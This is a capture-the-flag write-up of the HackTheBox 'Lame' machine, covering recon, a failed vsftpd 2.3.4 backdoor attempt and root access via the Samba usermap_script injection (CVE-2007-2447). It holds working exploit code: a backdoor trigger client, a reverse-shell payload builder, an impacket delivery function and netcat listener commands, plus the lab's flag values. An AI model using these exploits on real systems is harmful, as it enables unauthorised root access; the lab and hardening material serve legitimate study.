
HackTheBox - Lame

Following on from Legacy it was time to complete Lame, the first of many Linux machines. The machine required simple enumeration and another SMB exploit, resulting in a root shell.

Machine IP = 10.10.10.3


RECON AND INFORMATION GATHERING

Nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 16:41 BST
Nmap scan report for 10.10.10.3
Host is up (0.053s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.13
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

From the scan we can see FTP open on 21 (vsftpd 2.3.4) and SSH open on 22 (OpenSSH 4.7p1), plus SMB on 139 and 445 (Samba 3.X - 4.X). The failing SMB host scripts and the "Protocol negotiation failed (SMB2)" line suggest the server only speaks SMB1, which is worth remembering when connecting with modern SMB clients.


FTP

Anonymous Login

FTP anonymous login is enabled, however when checking, the directory is empty.

Exploits

After some googling it turned out that the vsftpd 2.3.4 source tarball on the project's download site had been swapped for a backdoored copy for a few days in mid-2011, so I used searchsploit to see whether there are any FTP exploits associated with vsftpd 2.3.4:

root@kali:~/Desktop# searchsploit vsftpd 2.3.4
----------------------------------------- ----------------------------------------
 Exploit Title                           |  Path
                                         | (/usr/share/exploitdb/)
----------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Executio | exploits/unix/remote/17491.rb
----------------------------------------- ----------------------------------------
Shellcodes: No Result

Looks promising, so I will come back to it later.


SMB

Anonymous Login

smbmap shows the tmp share is readable and writable without credentials, and the share comments leak the exact Samba version, 3.0.20-Debian:

root@kali:~/Desktop# smbmap -H 10.10.10.3
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.3...
[+] IP: 10.10.10.3:445	Name: 10.10.10.3                                        
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS	
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
root@kali:~/Desktop# 

At first I was unable to connect using smbclient: Samba 3.0.20 only speaks SMB1 (NT1), which recent smbclient builds refuse by default. After some googling I added client min protocol = NT1 to /etc/samba/smb.conf (the same setting can be passed for a single run with --option='client min protocol=NT1').

However, the tmp share did not yield anything interesting.


Exploits

Moving on, I searched searchsploit for Samba 3.0:

root@kali:~/Desktop# searchsploit Samba 3.0
-------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                        |  Path
                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------- ----------------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                  | exploits/osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                | exploits/multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)      | exploits/unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                    | exploits/linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                | exploits/linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)              | exploits/solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                              | exploits/linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                     | exploits/multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow                                      | exploits/linux/remote/364.pl
Samba < 3.0.20 - Remote Heap Overflow                                                 | exploits/linux/remote/7701.txt
-------------------------------------------------------------------------------------- ----------------------------------------

A wide range of exploits is listed. The share comments from smbmap gave the exact version, Samba 3.0.20-Debian, which falls inside the range covered by Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit), so that is the one to try.


Exploits

Exploiting VSFTPD

I started by searching msfconsole for any exploits associated with vsftpd.

msf5 > search vsftpd 2.3.4

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
   1  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
   2  exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   3  exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

exploit/unix/ftp/vsftpd_234_backdoor looked interesting, but sadly it was unsuccessful:

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > 

After looking into this exploit a little more: the backdoor is triggered by attempting to log in with a username that contains the two characters :) (for example anonymous:)). The trojaned daemon then binds /bin/sh on TCP port 6200, and the Metasploit module simply connects to that port after sending the trigger. Here the trigger is accepted (the 331 comes back) but no session is created, so no shell was reachable on port 6200 from the attacking host.
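To show what the module does on the wire, and why "no session" means "could not reach 6200" rather than "trigger rejected", here is an added example (my own code, not the Metasploit module or anything from the original post). It sends the smiley trigger and then probes the backdoor port. Because the real backdoor cannot be exercised offline, the block also contains a constructed stand-in server: with backdoor_reachable=True it opens the shell port after the trigger, with backdoor_reachable=False it accepts the trigger but never exposes a shell, which is the outcome seen on Lame. The banner, the "uid=0(root)" line and the localhost ports are all constructed test data.

```python
import socket
import threading

VSFTPD_BANNER = b"220 (vsFTPd 2.3.4)\r\n"
TRIGGER = b":)"        # the two bytes the backdoored daemon looks for in the username
BACKDOOR_PORT = 6200   # the real backdoor binds a root /bin/sh here once triggered


def trigger_vsftpd_backdoor(host, ftp_port=21, backdoor_port=BACKDOOR_PORT, timeout=3.0):
    """Send the smiley trigger, then try to reach the shell on backdoor_port.

    Returns a socket connected to the shell, or None when the shell port never
    becomes reachable (backdoor absent, already consumed, or 6200 filtered),
    which is the "no session was created" outcome Metasploit reports.
    """
    ctl = socket.create_connection((host, ftp_port), timeout=timeout)
    try:
        banner = ctl.recv(1024)
        if b"vsFTPd 2.3.4" not in banner:
            return None                    # only this release carried the backdoor
        ctl.sendall(b"USER anonymous" + TRIGGER + b"\r\n")
        if not ctl.recv(1024).startswith(b"331"):
            return None
        ctl.sendall(b"PASS anything\r\n")
        try:
            ctl.recv(1024)                 # a triggered daemon is busy serving the shell, so expect silence
        except socket.timeout:
            pass
        # keep the control connection open while probing, as the Metasploit module does
        try:
            return socket.create_connection((host, backdoor_port), timeout=timeout)
        except OSError:                    # refused or timed out: nothing reachable from our side
            return None
    finally:
        ctl.close()


class FakeBackdooredVsftpd:
    """Constructed stand-in for the trojaned daemon so the trigger can be run offline.

    With backdoor_reachable=False it behaves the way the Metasploit run on Lame
    ended: the trigger is accepted, but the shell port is never reachable.
    """

    def __init__(self, backdoor_reachable=True):
        self.backdoor_reachable = backdoor_reachable
        self.ctl = socket.socket()
        self.ctl.bind(("127.0.0.1", 0))
        self.ctl.listen(1)
        self.ftp_port = self.ctl.getsockname()[1]
        # bound but not listening: connects are refused until the trigger fires
        self.shell = socket.socket()
        self.shell.bind(("127.0.0.1", 0))
        self.backdoor_port = self.shell.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self.ctl.accept()
        with conn:
            conn.sendall(VSFTPD_BANNER)
            user = conn.recv(1024)
            conn.sendall(b"331 Please specify the password.\r\n")
            conn.recv(1024)                        # PASS, never acknowledged
            if TRIGGER in user and self.backdoor_reachable:
                self.shell.listen(1)
                sh, _ = self.shell.accept()
                with sh:
                    sh.sendall(b"uid=0(root) gid=0(root)\n")   # constructed shell output


if __name__ == "__main__":
    for reachable in (True, False):
        srv = FakeBackdooredVsftpd(backdoor_reachable=reachable)
        sh = trigger_vsftpd_backdoor("127.0.0.1", srv.ftp_port, srv.backdoor_port, timeout=1.0)
        print("reachable" if reachable else "filtered", "->", sh.recv(1024) if sh else "no shell")
```

The practical check this gives you on a real target is the same one the module does implicitly: if 6200 is refused or filtered after the trigger, the backdoor is not your way in, regardless of what the banner says.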


Exploiting Samba

When googling Samba 3 Username remote code execution, CVE-2007-2447 comes up. The bug: when a username map script is configured, Samba passed the client-supplied username to /bin/sh unescaped when invoking that script, so a username carrying backtick command substitution runs arbitrary commands as root before any authentication has succeeded. Further googling provided a python script https://github.com/amriunix/CVE-2007-2447

Following the installation instructions, the script gave an easy shell. First start a listener:

nc -nvlp 443

and then run the python script, pointing it at the target's port 139 and our listener:

root@kali:~/Desktop/CVE-2007-2447# python usermap_script.py 10.10.10.3 139 10.10.14.22 443
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
root@kali:~/Desktop/CVE-2007-2447# 

On the netcat listener we get the callback, and because smbd runs as root the shell is root from the start:

root@kali:~/Desktop/CVE-2007-2447# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.3] 59119
id
uid=0(root) gid=0(root)

Now we upgrade to a proper tty with python's pty module and start searching for the flags.

python -c 'import pty; pty.spawn("bash")'
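The injection the script relies on, as an added example that is neither the linked script nor Samba's own code: build_usermap_username produces a name of the same shape the Metasploit usermap_script module sends (/=`nohup ...`), vulnerable_username_map reproduces what Samba's smbrun() did (string built from the raw username, handed to /bin/sh -c), and fixed_username_map shows the two-part hardening of rejecting metacharacters and never going through a shell (an illustration, not Samba's actual patch). The demo fires a harmless payload that only touches a marker file, with the coreutils true binary standing in for the configured map script. send_usermap_payload delivers the real thing over SMB and assumes impacket is installed; the reverse shell string is my own named-pipe variant, not the one the linked script uses.

```python
import os
import subprocess
import tempfile

SHELL_META = set("`$|;&<>(){}\n'\"\\")


def reverse_shell_payload(lhost, lport):
    """Named-pipe reverse shell that works with a netcat lacking -e (my choice, an assumption)."""
    return (f"rm -f /tmp/p; mkfifo /tmp/p; cat /tmp/p | /bin/sh -i 2>&1 | "
            f"nc {lhost} {lport} > /tmp/p")


def build_usermap_username(command):
    """Username of the shape the Metasploit usermap_script module sends.
    Samba ends up running  <script> /=`nohup <command>`  and the shell evaluates
    the backticks (as root) before the script ever sees its argument."""
    return "/=`nohup " + command + "`"


def vulnerable_username_map(script, username):
    """What Samba 3.0.20 - 3.0.25rc3 did: smbrun() built a command line from the raw
    username and handed it to /bin/sh -c, so shell syntax in the name is honoured."""
    return subprocess.run(script + " " + username, shell=True,
                          capture_output=True, text=True)


def fixed_username_map(script, username):
    """Hardened form: reject metacharacters up front and pass the name as a single argv
    element with no shell in between. Even without the check, the argv form would hand
    the backticks to the script as literal text."""
    if SHELL_META & set(username):
        raise ValueError("username contains shell metacharacters")
    return subprocess.run([script, username], capture_output=True, text=True)


def demo(tmpdir=None):
    """Fire a harmless payload (touch a marker file) through both code paths.
    Returns (marker created by vulnerable path, marker created by fixed path)."""
    tmpdir = tmpdir or tempfile.mkdtemp()
    marker = os.path.join(tmpdir, "usermap_pwned")     # constructed side effect to observe
    username = build_usermap_username("touch " + marker)
    vulnerable_username_map("true", username)           # 'true' plays the configured map script
    hit_vulnerable = os.path.exists(marker)
    if hit_vulnerable:
        os.remove(marker)
    try:
        fixed_username_map("true", username)
    except ValueError:
        pass                                            # rejected before any process was spawned
    return hit_vulnerable, os.path.exists(marker)


def send_usermap_payload(rhost, lhost, lport, rport=139):
    """Deliver the username in an SMB session setup (requires impacket, an assumption).
    The login itself never completes; the payload has already run by the time Samba gives up."""
    from impacket.smbconnection import SMBConnection
    conn = SMBConnection(rhost, rhost, sess_port=rport, timeout=10)
    try:
        conn.login(build_usermap_username(reverse_shell_payload(lhost, lport)), "")
    except Exception:
        pass


if __name__ == "__main__":
    print("vulnerable path ran payload: %s, fixed path ran payload: %s" % demo())
```

The point worth taking from the demo is that the exploit needs no valid credentials at all: the username is evaluated by a root shell during session setup, so the only precondition is that a username map script is configured on the server.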


Flag Hunting

With root already in hand the flags are trivial to find: user.txt in makis' home directory and root.txt in /root.

User.txt

root@lame:/home/makis# cat user.txt
cat user.txt
69454a937d94f5f0225ea00acd2e84c5

Root.txt

root@lame:/root# cat root.txt
cat root.txt
92caac3be140ef409e45721348a4e9df

Understanding the Python Script

This post is licensed under CC BY 4.0 by the author.